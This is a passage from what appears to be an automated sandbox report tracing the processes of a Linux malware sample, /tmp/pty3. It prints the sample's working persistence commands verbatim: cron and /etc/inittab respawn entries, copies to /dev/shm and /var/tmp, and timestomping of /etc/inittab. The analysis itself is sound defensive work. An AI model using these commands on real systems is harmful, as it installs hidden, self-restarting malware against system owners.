Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5235 Parent PID: 5232

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/usr/bin/crontab
Arguments:	crontab -r
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: pty3 PID: 5231 Parent PID: 5223

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48980 bytes
MD5 hash:	fdd5532c5ec4d3238d2fd36b0a0b187f

Chronological Activities

Analysis Process: pty3 PID: 5234 Parent PID: 5231

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48980 bytes
MD5 hash:	fdd5532c5ec4d3238d2fd36b0a0b187f

Chronological Activities

Analysis Process: sh PID: 5234 Parent PID: 5231

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "crontab -l \| grep /tmp/pty3 \| grep -v \"no cron\" \|\| (crontab -l ; echo \"* * * * * /tmp/pty3 > /dev/null 2>&1 &\") \| crontab -"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5238 Parent PID: 5234

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5238 Parent PID: 5234

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/usr/bin/crontab
Arguments:	crontab -l
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: sh PID: 5239 Parent PID: 5234

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: grep PID: 5239 Parent PID: 5234

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/usr/bin/grep
Arguments:	grep /tmp/pty3
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Chronological Activities

Analysis Process: sh PID: 5240 Parent PID: 5234

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: grep PID: 5240 Parent PID: 5234

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/usr/bin/grep
Arguments:	grep -v "no cron"
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Chronological Activities

Analysis Process: sh PID: 5242 Parent PID: 5234

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5244 Parent PID: 5242

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5244 Parent PID: 5242

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/usr/bin/crontab
Arguments:	crontab -l
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: sh PID: 5243 Parent PID: 5234

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5243 Parent PID: 5234

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/usr/bin/crontab
Arguments:	crontab -
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: pty3 PID: 5233 Parent PID: 5223

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48980 bytes
MD5 hash:	fdd5532c5ec4d3238d2fd36b0a0b187f

Chronological Activities

Analysis Process: sh PID: 5233 Parent PID: 5223

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "cat /etc/inittab \| grep -v \"/tmp/pty3\" > /etc/inittab2"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5236 Parent PID: 5233

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: cat PID: 5236 Parent PID: 5233

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/usr/bin/cat
Arguments:	cat /etc/inittab
File size:	43416 bytes
MD5 hash:	7e9d213e404ad3bb82e4ebb2e1f2c1b3

Chronological Activities

Analysis Process: sh PID: 5237 Parent PID: 5233

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: grep PID: 5237 Parent PID: 5233

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/usr/bin/grep
Arguments:	grep -v /tmp/pty3
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Chronological Activities

Analysis Process: pty3 PID: 5241 Parent PID: 5223

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48980 bytes
MD5 hash:	fdd5532c5ec4d3238d2fd36b0a0b187f

Chronological Activities

Analysis Process: sh PID: 5241 Parent PID: 5223

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "echo \"0:2345:respawn:/tmp/pty3\" >> /etc/inittab2"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: pty3 PID: 5245 Parent PID: 5223

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48980 bytes
MD5 hash:	fdd5532c5ec4d3238d2fd36b0a0b187f

Chronological Activities

Analysis Process: sh PID: 5245 Parent PID: 5223

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "cat /etc/inittab2 > /etc/inittab"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5246 Parent PID: 5245

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: cat PID: 5246 Parent PID: 5245

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/usr/bin/cat
Arguments:	cat /etc/inittab2
File size:	43416 bytes
MD5 hash:	7e9d213e404ad3bb82e4ebb2e1f2c1b3

Chronological Activities

Analysis Process: pty3 PID: 5247 Parent PID: 5223

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48980 bytes
MD5 hash:	fdd5532c5ec4d3238d2fd36b0a0b187f

Chronological Activities

Analysis Process: sh PID: 5247 Parent PID: 5223

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "rm -rf /etc/inittab2"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5248 Parent PID: 5247

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: rm PID: 5248 Parent PID: 5247

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/usr/bin/rm
Arguments:	rm -rf /etc/inittab2
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Chronological Activities

Analysis Process: pty3 PID: 5249 Parent PID: 5223

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48980 bytes
MD5 hash:	fdd5532c5ec4d3238d2fd36b0a0b187f

Chronological Activities

Analysis Process: sh PID: 5249 Parent PID: 5223

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "touch -acmr /bin/ls /etc/inittab"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5250 Parent PID: 5249

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: touch PID: 5250 Parent PID: 5249

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/usr/bin/touch
Arguments:	touch -acmr /bin/ls /etc/inittab
File size:	100728 bytes
MD5 hash:	3859c173f5d3b37be3e531b7c84a9c68

Chronological Activities

Analysis Process: pty3 PID: 5251 Parent PID: 5223

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48980 bytes
MD5 hash:	fdd5532c5ec4d3238d2fd36b0a0b187f

Chronological Activities

Analysis Process: pty3 PID: 5252 Parent PID: 5251

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48980 bytes
MD5 hash:	fdd5532c5ec4d3238d2fd36b0a0b187f

Chronological Activities

Analysis Process: sh PID: 5252 Parent PID: 5251

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "cp -f /tmp/pty3 /dev/shm/pty3"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5255 Parent PID: 5252

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: cp PID: 5255 Parent PID: 5252

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/usr/bin/cp
Arguments:	cp -f /tmp/pty3 /dev/shm/pty3
File size:	153976 bytes
MD5 hash:	40f10ae7ea3e44218d1a8c306f79c83f

Chronological Activities

Analysis Process: pty3 PID: 5257 Parent PID: 5251

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48980 bytes
MD5 hash:	fdd5532c5ec4d3238d2fd36b0a0b187f

Chronological Activities

Analysis Process: pty3 PID: 5259 Parent PID: 5257

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48980 bytes
MD5 hash:	fdd5532c5ec4d3238d2fd36b0a0b187f

Chronological Activities

Analysis Process: sh PID: 5259 Parent PID: 5257

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "crontab -l \| grep /dev/shm/pty3 \| grep -v \"no cron\" \|\| (crontab -l ; echo \"* * * * * /dev/shm/pty3 > /dev/null 2>&1 &\") \| crontab -"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5262 Parent PID: 5259

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5262 Parent PID: 5259

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/usr/bin/crontab
Arguments:	crontab -l
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: sh PID: 5263 Parent PID: 5259

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: grep PID: 5263 Parent PID: 5259

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/usr/bin/grep
Arguments:	grep /dev/shm/pty3
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Chronological Activities

Analysis Process: sh PID: 5264 Parent PID: 5259

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: grep PID: 5264 Parent PID: 5259

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/usr/bin/grep
Arguments:	grep -v "no cron"
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Chronological Activities

Analysis Process: sh PID: 5266 Parent PID: 5259

General

Start time:	11:31:21
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5268 Parent PID: 5266

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5268 Parent PID: 5266

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/usr/bin/crontab
Arguments:	crontab -l
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: sh PID: 5267 Parent PID: 5259

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5267 Parent PID: 5259

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/usr/bin/crontab
Arguments:	crontab -
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: pty3 PID: 5258 Parent PID: 5251

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48980 bytes
MD5 hash:	fdd5532c5ec4d3238d2fd36b0a0b187f

Chronological Activities

Analysis Process: sh PID: 5258 Parent PID: 5251

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "cat /etc/inittab \| grep -v \"/dev/shm/pty3\" > /etc/inittab2"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5260 Parent PID: 5258

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: cat PID: 5260 Parent PID: 5258

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/usr/bin/cat
Arguments:	cat /etc/inittab
File size:	43416 bytes
MD5 hash:	7e9d213e404ad3bb82e4ebb2e1f2c1b3

Chronological Activities

Analysis Process: sh PID: 5261 Parent PID: 5258

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: grep PID: 5261 Parent PID: 5258

General

Start time:	11:31:20
Start date:	23/12/2021
Path:	/usr/bin/grep
Arguments:	grep -v /dev/shm/pty3
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Chronological Activities

Analysis Process: pty3 PID: 5265 Parent PID: 5251

General

Start time:	11:31:21
Start date:	23/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48980 bytes
MD5 hash:	fdd5532c5ec4d3238d2fd36b0a0b187f

Chronological Activities

Analysis Process: sh PID: 5265 Parent PID: 5251

General

Start time:	11:31:21
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "echo \"0:2345:respawn:/dev/shm/pty3\" >> /etc/inittab2"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: pty3 PID: 5269 Parent PID: 5251

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48980 bytes
MD5 hash:	fdd5532c5ec4d3238d2fd36b0a0b187f

Chronological Activities

Analysis Process: sh PID: 5269 Parent PID: 5251

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "cat /etc/inittab2 > /etc/inittab"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5270 Parent PID: 5269

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: cat PID: 5270 Parent PID: 5269

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/usr/bin/cat
Arguments:	cat /etc/inittab2
File size:	43416 bytes
MD5 hash:	7e9d213e404ad3bb82e4ebb2e1f2c1b3

Chronological Activities

Analysis Process: pty3 PID: 5271 Parent PID: 5251

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48980 bytes
MD5 hash:	fdd5532c5ec4d3238d2fd36b0a0b187f

Chronological Activities

Analysis Process: sh PID: 5271 Parent PID: 5251

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "rm -rf /etc/inittab2"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5272 Parent PID: 5271

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: rm PID: 5272 Parent PID: 5271

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/usr/bin/rm
Arguments:	rm -rf /etc/inittab2
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Chronological Activities

Analysis Process: pty3 PID: 5273 Parent PID: 5251

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48980 bytes
MD5 hash:	fdd5532c5ec4d3238d2fd36b0a0b187f

Chronological Activities

Analysis Process: sh PID: 5273 Parent PID: 5251

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "touch -acmr /bin/ls /etc/inittab"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5274 Parent PID: 5273

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: touch PID: 5274 Parent PID: 5273

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/usr/bin/touch
Arguments:	touch -acmr /bin/ls /etc/inittab
File size:	100728 bytes
MD5 hash:	3859c173f5d3b37be3e531b7c84a9c68

Chronological Activities

Analysis Process: pty3 PID: 5275 Parent PID: 5251

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48980 bytes
MD5 hash:	fdd5532c5ec4d3238d2fd36b0a0b187f

Chronological Activities

Analysis Process: sh PID: 5275 Parent PID: 5251

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "cp -f /tmp/pty3 /var/tmp/pty3"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5276 Parent PID: 5275

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: cp PID: 5276 Parent PID: 5275

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/usr/bin/cp
Arguments:	cp -f /tmp/pty3 /var/tmp/pty3
File size:	153976 bytes
MD5 hash:	40f10ae7ea3e44218d1a8c306f79c83f

Chronological Activities

Analysis Process: pty3 PID: 5277 Parent PID: 5251

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48980 bytes
MD5 hash:	fdd5532c5ec4d3238d2fd36b0a0b187f

Chronological Activities

Analysis Process: pty3 PID: 5279 Parent PID: 5277

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48980 bytes
MD5 hash:	fdd5532c5ec4d3238d2fd36b0a0b187f

Chronological Activities

Analysis Process: sh PID: 5279 Parent PID: 5277

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "crontab -l \| grep /var/tmp/pty3 \| grep -v \"no cron\" \|\| (crontab -l ; echo \"* * * * * /var/tmp/pty3 > /dev/null 2>&1 &\") \| crontab -"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5282 Parent PID: 5279

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5282 Parent PID: 5279

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/usr/bin/crontab
Arguments:	crontab -l
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: sh PID: 5283 Parent PID: 5279

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: grep PID: 5283 Parent PID: 5279

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/usr/bin/grep
Arguments:	grep /var/tmp/pty3
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Chronological Activities

Analysis Process: sh PID: 5284 Parent PID: 5279

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: grep PID: 5284 Parent PID: 5279

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/usr/bin/grep
Arguments:	grep -v "no cron"
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Chronological Activities

Analysis Process: sh PID: 5288 Parent PID: 5279

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5290 Parent PID: 5288

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5290 Parent PID: 5288

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/usr/bin/crontab
Arguments:	crontab -l
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: sh PID: 5289 Parent PID: 5279

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5289 Parent PID: 5279

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/usr/bin/crontab
Arguments:	crontab -
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: pty3 PID: 5278 Parent PID: 5251

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48980 bytes
MD5 hash:	fdd5532c5ec4d3238d2fd36b0a0b187f

Chronological Activities

Analysis Process: sh PID: 5278 Parent PID: 5251

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "cat /etc/inittab \| grep -v \"/var/tmp/pty3\" > /etc/inittab2"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5280 Parent PID: 5278

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: cat PID: 5280 Parent PID: 5278

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/usr/bin/cat
Arguments:	cat /etc/inittab
File size:	43416 bytes
MD5 hash:	7e9d213e404ad3bb82e4ebb2e1f2c1b3

Chronological Activities

Analysis Process: sh PID: 5281 Parent PID: 5278

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: grep PID: 5281 Parent PID: 5278

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/usr/bin/grep
Arguments:	grep -v /var/tmp/pty3
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Chronological Activities

Analysis Process: pty3 PID: 5287 Parent PID: 5251

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48980 bytes
MD5 hash:	fdd5532c5ec4d3238d2fd36b0a0b187f

Chronological Activities

Analysis Process: sh PID: 5287 Parent PID: 5251

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "echo \"0:2345:respawn:/var/tmp/pty3\" >> /etc/inittab2"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: pty3 PID: 5291 Parent PID: 5251

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48980 bytes
MD5 hash:	fdd5532c5ec4d3238d2fd36b0a0b187f

Chronological Activities

Analysis Process: sh PID: 5291 Parent PID: 5251

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "cat /etc/inittab2 > /etc/inittab"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5292 Parent PID: 5291

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: cat PID: 5292 Parent PID: 5291

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/usr/bin/cat
Arguments:	cat /etc/inittab2
File size:	43416 bytes
MD5 hash:	7e9d213e404ad3bb82e4ebb2e1f2c1b3

Chronological Activities

Analysis Process: pty3 PID: 5293 Parent PID: 5251

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48980 bytes
MD5 hash:	fdd5532c5ec4d3238d2fd36b0a0b187f

Chronological Activities

Analysis Process: sh PID: 5293 Parent PID: 5251

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "rm -rf /etc/inittab2"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5294 Parent PID: 5293

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: rm PID: 5294 Parent PID: 5293

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/usr/bin/rm
Arguments:	rm -rf /etc/inittab2
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Chronological Activities

Analysis Process: pty3 PID: 5295 Parent PID: 5251

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48980 bytes
MD5 hash:	fdd5532c5ec4d3238d2fd36b0a0b187f

Chronological Activities

Analysis Process: sh PID: 5295 Parent PID: 5251

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	sh -c "touch -acmr /bin/ls /etc/inittab"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5296 Parent PID: 5295

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: touch PID: 5296 Parent PID: 5295

General

Start time:	11:31:22
Start date:	23/12/2021
Path:	/usr/bin/touch
Arguments:	touch -acmr /bin/ls /etc/inittab
File size:	100728 bytes
